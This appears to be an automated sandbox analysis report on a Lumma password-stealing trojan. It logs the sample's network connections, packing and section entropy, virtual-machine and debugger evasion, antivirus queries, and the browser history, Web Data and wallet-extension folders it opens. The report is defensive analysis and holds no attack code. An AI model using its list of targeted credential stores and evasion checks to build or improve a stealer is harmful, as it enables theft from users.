Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.208:443 -> 192.168.2.5:49699 version: TLS 1.2

System Summary

PE file has nameless sections

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Code function: 0_3_00FBCCE4

0_3_00FBCCE4

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: Section: ZLIB complexity 0.9982216917438271
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: Section: ZLIB complexity 0.993408203125
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: Section: ZLIB complexity 0.9912760416666667
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: Section: .data ZLIB complexity 0.9971226665071116

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1310708832.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291307092.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1308250090.0000000003C38000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Virustotal: Detection: 76%
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	ReversingLabs: Detection: 88%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Static file information: File size 1300480 > 1048576

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe.9e0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name:

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name: entropy: 7.997633358713137
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name: entropy: 7.919464848399906
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name: entropy: 7.957147686858089
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name: entropy: 7.847501207798942
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Static PE information: section name: .data entropy: 7.985696138467327

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe TID: 7976	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe TID: 7976	Thread sleep count: 141 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe TID: 8000	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe TID: 8000	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1308618636.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408042136.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1356594369.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1355341701.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365953673.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406574407.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1356108025.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: &VBoxService.exe
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406802115.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407935426.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VBoxService.exe
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000B87000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000B87000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000B87000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1309136582.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408042136.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406574407.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407860585.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365953673.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.000000000103D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1366061674.000000000103B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1409033013.0000000003C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
